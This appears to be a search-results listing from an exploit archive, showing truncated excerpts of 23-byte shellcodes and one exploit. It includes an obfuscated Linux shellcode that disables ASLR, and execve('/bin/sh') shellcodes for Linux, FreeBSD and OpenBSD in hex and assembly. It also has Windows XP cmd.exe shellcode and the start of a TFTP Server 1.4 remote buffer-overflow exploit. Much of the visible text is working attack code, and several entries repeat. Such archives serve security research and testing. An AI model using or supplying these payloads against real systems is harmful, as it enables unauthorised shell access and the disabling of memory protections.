23 matches found
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp zero2 zero18: mov al,0x4 jmp zero19 zero1a: mov al,0x6 jmp zero1b zeroc: push 0x72702f2f jmp zerod zero12:...
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode 23 bytes. Shellcode exploit for Linuxx86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...
FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)
/ -------------- FreeBSD/x86 - execv"/bin/sh" 23 bytes ------------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : email protected / include include char shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50" "\x54\x53\xb0\x3b\x50\xcd\x80"; int...
linux/x86 execve /bin/sh - shellcode 23 bytes
/ Compile with: gcc -fno-stack-protector -z execstack 23 byte execve shellcode 2 ; int execveconst char filename, char const argv, char const envp; 3 BITS 64 4 5 section .text 6 global start 7 8 start: 9 xor rdx, rdx ;zero out rdx 10 push rdx ;push rdx to stack to null terminate /bin//sh 11 mov a...
Linux x86 - execve /bin/sh 23 Bytes
Linux x86 - execve /bin/sh 23 Bytes. Shellcode exploit for linx86-64 platform / Compile with: gcc -fno-stack-protector -z execstack 23 byte execve shellcode 2 ; int execveconst char filename, char const argv, char const envp; 3 BITS 64 4 5 section .text 6 global start 7 8 start: 9 xor rdx, rdx...
linux/x86-64 - Execve /bin/sh Shellcode Via Push - 23 bytes
/ Execve /bin/sh Shellcode Via Push Linux x8664 23 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong email protected 27 April 2015 GPL .global start start: char const argv xorl %esi, %esi 'h' 's' '/' '/' 'n' 'i' 'b' '/' movq $0x68732f2f6e69622f, %rbx for '\x00' pushq %rsi pushq %rbx...
Linux x86-64 - Execve /bin/sh Shellcode Via Push 23 bytes
Linux x86-64 - Execve /bin/sh Shellcode Via Push 23 bytes. Shellcode exploit for linx86-64 platform / Execve /bin/sh Shellcode Via Push Linux x8664 23 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong [email protected] 27 April 2015 GPL .global start start: char const argv xorl %esi,...
freebsd/x86 execve /bin/sh 23 bytes (2)
No description provided by source. / FreeBSD 23 byte execve code. Greetz to anathema, the first who published this way of writing shellcodes. greetz to preedator marcetam [email protected] / char fbsdexecve= \x99 / cdq / \x52 / push %edx / \x68\x6e\x2f\x73\x68 / push $0x68732f6e /...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...
win32/xp sp2 (En + Ar) cmd.exe 23 bytes
No description provided by source. / win32/xp sp2 En + Ar cmd.exe 23 bytes Author : AnTi SeCuRe TeaM : SauDi ViRuS TeaM Email : [email protected] Site : WwW.VxX9.Cc Thx To : Stack , SauDi ViRuS TeaM RENO - Dr.php - ! BaD BoY ! - Jetli007 - Gov.hacker Description : It's a 23 Byte Shellcode...
win32/xp sp2 En + Ar cmd.exe 23 bytes
win32/xp sp2 En + Ar cmd.exe 23 bytes. Shellcode exploit for win32 platform / win32/xp sp2 En + Ar cmd.exe 23 bytes Author : AnTi SeCuRe TeaM : SauDi ViRuS TeaM Email : [email protected] Site : WwW.VxX9.Cc Thx To : Stack , SauDi ViRuS TeaM RENO - Dr.php - ! BaD BoY ! - Jetli007 - Gov.hacker...
TFTP Server 1.4 - Remote Buffer Overflow (2)
TFTP Server 1.4 - Remote Buffer Overflow 2 !/usr/bin/env python This vuln is already owned by Muts , but i want to add the second methode Note: we don't have more space for shellcode or Skape egghunter 23 bytes only after SEH option I used the jumpback because is the best and easiest way for...
win32/xp sp2 (En) cmd.exe 23 bytes
No description provided by source. / win32/xp sp2 En cmd.exe 23 bytes Author : Mountassif Moad A.K.A : Stack Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En get the following if we disassemle this code compiled with olly debugger 00402000 8BEC MOV EBP,E...
win32/xp sp2 En cmd.exe 23 bytes
win32/xp sp2 En cmd.exe 23 bytes. Shellcode exploit for win32 platform / win32/xp sp2 En cmd.exe 23 bytes Author : Mountassif Moad A.K.A : Stack Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En get the following if we disassemle this code compiled with...
openbsd/x86 execve(/bin/sh) 23 bytes
No description provided by source. / OpenBSD/x86 Shellcode for: execve"/bin/sh", "/bin/sh", NULL 23 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ Fancy mappings by iruata souza muzgo iru.muzgo!gmail.com http://openvms-rocks.com/muzgo/ / include sys/types.h include sys/stat.h include...
openbsd/x86 execve(/bin/sh) 23 bytes
Exploit for openbsd/x86 platform in category shellcode ==================================== openbsd/x86 execve/bin/sh 23 bytes ==================================== / OpenBSD/x86 Shellcode for: execve"/bin/sh", "/bin/sh", NULL 23 bytes / include include include include include include include...
openbsd/x86 execve/bin/sh 23 bytes
openbsd/x86 execve/bin/sh 23 bytes. Shellcode exploit for openbsdx86 platform / OpenBSD/x86 Shellcode for: execve"/bin/sh", "/bin/sh", NULL 23 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ Fancy mappings by iruata souza muzgo iru.muzgo!gmail.com http://openvms-rocks.com/muzgo/ / inclu...
freebsd/x86 execve /bin/sh 23 bytes
No description provided by source. / FreeBSDx86-execvesh-23b-iZ.c Shellcode, execve /bin/sh, 23 bytes by IZ guerrilla.sytes.net / char setreuidcode = "\x31\xc0" / xor %eax,%eax / "\x50" / push %eax / "\x68\x2f\x2f\x73\x68" / push $0x68732f2f //sh / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f /bin/...
linux/x86 - execve"/bin/sh", "/bin/sh", NULL 23 bytes
linux/x86 execve"/bin/sh", "/bin/sh", NULL 23 bytes. Shellcode exploit for linx86 platform / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security Linux/x86 execve"/bin/sh", "/bin/sh", NULL / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %ed...
linux/x86 execve(""/bin/sh"" [""/bin/sh"" NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve"/bin/sh", "/bin/sh", NULL / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push...